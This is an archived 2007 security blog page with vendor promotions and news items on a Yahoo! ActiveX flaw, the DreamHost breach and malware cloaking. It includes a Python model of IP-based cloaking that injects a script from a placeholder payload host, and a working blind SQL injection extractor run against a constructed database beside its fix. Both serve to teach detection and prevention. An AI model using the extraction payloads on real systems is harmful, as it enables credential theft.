Archive for June, 2007

Proactive Strategies for Securing Your Applications

Sunday, June 10th, 2007

Neophasis

The threat vectors that target today’s software applications are constantly evolving. While commercial software security features are improving, vulnerabilities still exist.

Customized and proprietary software, which powers much of today’s business operations, is even more exposed: attackers increasingly target applications ranging from e-commerce platforms to legacy accounting systems, none of which receive the scrutiny or patch cadence of commercial packages.

Probability and Severity

As the number of companies deploying proprietary software on or near public networks continues to spike, concerns about application security are more acute than ever.

Secured SDLC

What steps can you take to protect your company?

An effective, proactive defense against today’s attacks and tomorrow’s threats requires the right combination of technology and expertise.

Degree of Security Assurance and Review Time

Making sure you have the right team in place, typically a blend of internal and external experts, is the first step. Methodically identifying and addressing your company’s vulnerabilities, and establishing a plan for ongoing defensive measures is the next.

This FREE whitepaper from Neophasis will help you better understand the threats your company is facing, and the immediate steps you can take to confidently secure your applications.

Download Neophasis’ Proactive Strategies for Securing Your Applications FREE Whitepaper

Anatomy of a Breach Webcast

Saturday, June 9th, 2007

June 13, 2007, 12 p.m. EDT

You harbor vast amounts of confidential information ranging from credit cards to health information to corporate plans. That proprietary data is today’s “new money” and someone is willing to pay for it. Unfortunately, the miscreants who want it may know more about technology—and your IT environment—than your own staff. The stakes are enormous: for your customers, your company, and you.

In this webcast, we examine the fundamental shift of IT risk to the insider threat and the inability of legacy protection mechanisms to stop it. We itemize and quantify the impact from containment to notification. Most importantly, we discuss eradication of the breach risk. New, targeted, caustic threats require new responses that strictly secure your critical information assets, while proving it with 100 percent surety.

Who Should Watch:
Executives responsible for audits, compliance and mitigating data breach risks and security professionals responsible for protecting critical assets on their networks
About the speakers:
William Malik
Consultant, Identity and Information Security
Malik Consulting

Bill Malik has been well-known in information security since the early 1990s when he was a founding member of Gartner’s Information Security Strategies service. He began his IT career in Boston as an applications programmer with the John Hancock Insurance Company following undergraduate work at MIT. He joined IBM’s MVS team and worked in development, testing, business planning, and strategic planning for a dozen years. He moved to Gartner in 1990 and held a series of roles as an analyst and manager through 2002. As CTO of Waveset, a start-up in identity management, he helped the firm grow through its acquisition by Sun, where Bill became Director of Marketing for Security. In 2004 Bill established his independent consulting firm, where he helps clients develop their identity management and information security programs.

Robert Ciampa
Vice President, Marketing and Business Strategy
Trusted Network Technologies

Rob Ciampa has more than 20 years of experience in IT risk management, networking and security. Rob has worked with companies around the world designing and implementing secure infrastructures. An early OS engineer for HP and a former switch and router designer for 3Com, he co-founded one of the world’s largest network and security integration firms. Rob then went on to Access360, where he was instrumental in its acquisition by IBM, where he subsequently ran IBM’s worldwide channel for security and identity management. In addition to television commentary on IT and computer security issues, Rob is frequently a featured speaker at major IT venues and events internationally. He has a B.S. in computer science and an M.S. in computer engineering from the University of Massachusetts, as well as an M.B.A. from Boston University. He holds two patents in information technology management. His blog is www.knowidentity.com.

Join the Anatomy of a Breach Webcast

RSA Data Integrity Strategy Kit for the Financial Industry

Friday, June 8th, 2007

Get a complimentary copy of the Data Integrity Strategy Kit for the Financial Industry from RSA, featuring a new Burton Group report with actionable information on preventing unauthorized or inappropriate changes to business information.

Data Integrity Strategy Kit for the Financial Industry At a Glance:

Burton Group Report
Security and Risk Management Strategies: Information Integrity, March 2007

Podcast
“Real-World Strategies for Protecting your Data” with Jon Oltsik of Enterprise Strategy Group

Data Sheet: File Security Manager
Centrally managed, transparent compromise prevention for critical files

Data Sheet: Database Security Manager
Transparent, policy-driven data protection optimized for heterogeneous database environments
Limited time offer. Download now! http://www.sans.org/info/8461

Yahoo! Messenger ActiveX Flaw Exploits Released!

Thursday, June 7th, 2007

Yahoo! Messenger

Two zero-day exploits for remote code execution flaws in Yahoo! Messenger’s Webcam application have been released.

One of the flaws is a boundary error in the Yahoo! Webcam Upload ActiveX control; the other is in the Yahoo! Webcam Viewer ActiveX control.

Yahoo! expects to have a fix for the flaws available soon.  The flaws have been confirmed in Yahoo! Messenger version 8.1.0.249 and may exist in other versions as well.  Because both are ActiveX controls, the attack vector is a web page (or HTML e-mail) that instantiates the control in Internet Explorer; until the patch is installed, disabling the affected controls or turning off ActiveX for the Internet zone closes that vector.

{Update: As of Friday, June 8, 2007, Yahoo! has already prompted Yahoo! Messenger users to download and install a security upgrade that patches the issue.}

More info here on the Yahoo! ActiveX Flaw.

Dreamhost’s Systems Hacked Yet Again

Wednesday, June 6th, 2007

Attackers broke into the computer systems of web host company DreamHost and installed malware on hundreds of websites, including the official site of the Mercury music awards.

DreamHost said the intruder or intruders exploited a flaw in its web control panel software.

DreamHost has notified affected customers of the breach via email.

The attackers attempted to access the company’s central database and billing data, but no billing or credit card data were compromised in the intrusion.

DreamHost is responsible for more than 500,000 domains.  The intrusion affected approximately 3,500 FTP accounts; users were urged to change their FTP account passwords as soon as possible.

Read Dreamhost’s official statement on the breach

Hackers Use New Evasive Techniques to Avoid Malware Detection

Tuesday, June 5th, 2007

Hackers are developing increasingly stealthy techniques to evade detection.  The attacks place malicious code on web sites, then track the IP addresses that have visited the infected pages; when the same IP address requests a page again, benign content is served instead.

The attacks also identify “the IP addresses of web crawlers used by URL filtering, reputation services and search engines,” and serve those addresses legitimate content so the site is never classified as malicious.

Finjan describes these as a new class of highly evasive attacks, a step beyond the drive-by downloads and code obfuscation already in circulation. The practical consequence for defenders: a scanner that fetches a suspect URL from a fixed, well-known address, or that fetches it a second time to confirm a hit, sees only the clean page. Catching the cloaking requires requesting the page from fresh, unattributed addresses and comparing the responses, because the difference between what the first and the second visitor receive is itself the indicator.

Combined with code obfuscation, these evasion techniques significantly enhance a sophisticated attacker’s ability to go undetected.
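As an added example (not code from Finjan, VNUNet or this site), the Python below models the IP-keyed serving logic described above and the differential check a scanner can run against it. The crawler address blocks, page bodies and payload host are constructed from documentation (TEST-NET) ranges and are assumptions for illustration; a real scanner would issue HTTP requests from each vantage point where this code calls serve() in-process.

```python
import ipaddress
import re

# Constructed: address blocks the attacker has catalogued as crawlers, URL-filtering
# scanners and reputation services (documentation ranges stand in for real ones).
CRAWLER_RANGES = [
    ipaddress.ip_network("192.0.2.0/24"),      # assumed search-engine crawler block
    ipaddress.ip_network("198.51.100.0/24"),   # assumed URL-filtering / reputation scanner block
]

# Constructed page bodies. The "payload" is a stand-in for the injected, obfuscated loader.
BENIGN_PAGE = "<html><body><h1>Welcome</h1><p>Seasonal offers inside.</p></body></html>"
MALICIOUS_PAGE = BENIGN_PAGE.replace(
    "</body>", "<script src='http://203.0.113.77/ld.js'></script></body>")


class CloakingServer:
    """Attacker-side serving logic: the payload goes to a fresh, non-crawler IP exactly
    once; every repeat visit and every known crawler address gets the clean page."""

    def __init__(self, crawler_ranges):
        self.crawler_ranges = crawler_ranges
        self.seen = set()   # IPs that have already received the payload

    def is_crawler(self, ip):
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.crawler_ranges)

    def serve(self, ip):
        if self.is_crawler(ip) or ip in self.seen:
            return BENIGN_PAGE
        self.seen.add(ip)
        return MALICIOUS_PAGE


def external_scripts(body):
    """Indicator extraction: external script sources referenced by a fetched page."""
    return re.findall(r"<script\s+src=['\"]([^'\"]+)['\"]", body)


def differential_scan(server, probe_ips):
    """Defender-side check: fetch the URL twice from each probe address and compare.
    Returns (cloaked, responses) where responses maps (ip, attempt) -> body. More than
    one distinct body across the fetches means the server is tailoring content."""
    responses = {}
    for ip in probe_ips:
        for attempt in (1, 2):
            responses[(ip, attempt)] = server.serve(ip)
    cloaked = len(set(responses.values())) > 1
    return cloaked, responses


if __name__ == "__main__":
    # Scanning only from a reputation-service address never sees the payload.
    print(differential_scan(CloakingServer(CRAWLER_RANGES), ["198.51.100.9"])[0])
    # Adding one fresh address exposes the cloaking: its first and second fetch differ.
    cloaked, resp = differential_scan(CloakingServer(CRAWLER_RANGES),
                                      ["203.0.113.10", "198.51.100.9"])
    print(cloaked, external_scripts(resp[("203.0.113.10", 1)]))
```

The scan keyed on a single fixed address is the blind spot the article describes; the double fetch from a fresh address turns the attacker's own "serve it once" rule into the detection signal.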

A follow-up study conducted by Finjan’s Malicious Code Research Centre warns of the growing presence of malicious code in online advertising.

More info at: VNUNet

How A Hacker Launches A Blind SQL Injection Attack!

Saturday, June 2nd, 2007

SPI Dynamics

It’s been estimated that three-fourths of today’s successful system hacks are perpetrated not via network security flaws but by walking in through the “front door”: exploiting vulnerabilities in customer-facing web applications. SQL injection is the classic front-door attack, and its blind variant is the one that survives when an application hides query results and error messages: the attacker asks the database one true/false question per request, reads the answer from a difference in the page’s content or response time, and recovers data one character at a time.

Grab a copy of SPI Dynamics’ FREE SQL Injection white paper, “SQL Injection: Are Your Web Applications Vulnerable?”, to understand and prevent SQL injection attacks today.
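As an added example, not from the SPI Dynamics paper or this site, the Python below puts a constructed string-concatenated lookup beside its parameterized fix and runs a boolean-based blind extraction against each. The table, the sample credential and the oracle function names are assumptions for illustration; the attack logic (binary search on length, then on each character's code point) is the general technique and works against any yes/no oracle.

```python
import sqlite3


def make_db():
    """Constructed sample database: one user table with a single row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret!')")  # constructed credential
    return conn


def user_exists_vulnerable(conn, username):
    """The 'before' code: string concatenation. It returns only True/False and swallows
    errors, so the attacker gets no query output and no error text: the blind setting."""
    sql = "SELECT 1 FROM users WHERE username = '" + username + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def user_exists_safe(conn, username):
    """The fix: a bound parameter. The input is data and is never parsed as SQL."""
    sql = "SELECT 1 FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


def ask(oracle, condition):
    """One yes/no question. The payload closes the quoted string, ANDs a condition on
    the matched row, and comments out the query's trailing quote."""
    return oracle("admin' AND (" + condition + ") -- ")


def extract_password(oracle, max_len=64):
    """Boolean-based blind extraction by binary search: first the length, then each
    character's code point, about seven requests per character. Returns '' when the
    oracle never answers yes, as it never does against the parameterized check."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(oracle, "length(password) > %d" % mid):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    chars = []
    for pos in range(1, length + 1):        # SQLite substr() is 1-indexed
        lo, hi = 32, 126                    # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(oracle, "unicode(substr(password,%d,1)) > %d" % (pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def count_queries(fn):
    """Wrap an oracle so the demo can report how many requests the attack needed."""
    calls = [0]

    def wrapped(username):
        calls[0] += 1
        return fn(username)

    wrapped.calls = calls
    return wrapped


if __name__ == "__main__":
    conn = make_db()
    leaky = count_queries(lambda u: user_exists_vulnerable(conn, u))
    print("recovered:", extract_password(leaky), "in", leaky.calls[0], "requests")
    fixed = count_queries(lambda u: user_exists_safe(conn, u))
    print("against the parameterized query:", repr(extract_password(fixed)))
```

The request count is the point for defenders: a few dozen requests per secret, each one an ordinary-looking login probe, is cheap for an attacker and easy to miss in logs unless you alert on the burst of near-identical requests with varying quoted payloads.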

Who is lurking in your computer? Find out.

Friday, June 1st, 2007

Panda Malware Radar

Viruses and threats are changing.

They are now more dangerous than ever. They are more discreet. They are faster. They are frequently designed to steal confidential information or money. They can even be ‘tailor-made’ to target each victim.

Malware Radar is a revolutionary breakthrough scanning technology developed by Panda Software. Malware Radar has found banks, Fortune 500 companies, small businesses, and even government agencies infected with hidden malicious programs actively stealing information despite being “protected” by what they thought were the best antivirus and Internet security measures available.

Fast, comprehensive, and easy to use:

  •     Works online - nothing to install
  •     Finds and completely removes hidden malware
  •     Works with all antivirus and security programs (does NOT replace them)
  •     Leaves no trace on system after scan
  •     Produces full comprehensive reports on system vulnerabilities and malware found

Take Malware Radar for a spin to get an automated malware audit.